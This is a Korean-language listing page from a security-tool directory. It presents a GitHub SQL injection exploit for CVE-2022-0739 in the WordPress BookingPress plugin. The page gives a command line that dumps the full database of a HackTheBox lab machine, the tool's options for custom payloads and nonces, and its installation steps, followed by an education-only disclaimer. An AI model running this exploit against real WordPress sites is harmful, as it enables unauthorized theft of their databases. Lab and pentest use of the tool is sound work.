Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-0739 — destr4ct POC를 기반으로 한 WP BookingPress (< 1.0.11) 익스플로잇 | Kitploit
도구/GitHubGitHub/viardant/cve-2022-0739
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubviardant/cve-2022-0739

CVE-2022-0739

destr4ct POC를 기반으로 한 WP BookingPress (< 1.0.11) 익스플로잇

저장소 보기
43년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-0739

CVE-2022-0739 BookingPress 익스플로잇에 대한 제 버전입니다. destr4ct의 POC를 기반으로 했으며, 조금 더 보기 좋게 다듬었습니다.

예제

HackTheBox의 MetaTwo 머신을 대상으로 한 예제입니다. 해당 머신은 취약한 bookingpress 플러그인(버전 1.0.10)이 설치된 WordPress를 호스팅합니다.

root@kitploit:~
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump

asciicast

사용법

root@kitploit:~
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of WordPress server with vulnerable plugin (http://example.domain)
  -o BASENAME, --out BASENAME
                        Output database schema and dump in JSON format
  -p PAYLOAD, --payload PAYLOAD
                        Payload to inject. Should start with ')'
  -a, --dump-all        Enables whole DB dump
  -v, --verbose         Enables verbose mode
  -n NONCE, --nonce NONCE
                        Nonce that you got as unauthenticated user
  -nu NONCE_URL, --nonce-url NONCE_URL
                        URL where nonce can be extracted (bookingprss form page)

설치

root@kitploit:~
git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txt

면책 조항

TL:DR; 교육 목적으로만 사용하세요. 소유하지 않았거나 침투 테스트 허가를 받지 않은 대상은 망가뜨리지 마세요. 이 프로그램을 불법적인 목적으로 사용하면, 사이버 보안의 신들이 당신의 컴퓨터를 너무나 치명적인 맬웨어로 내리쳐서, 차라리 Mac을 샀더라면 좋았을 것이라고 후회하게 될 수도 있습니다.

도구 다운로드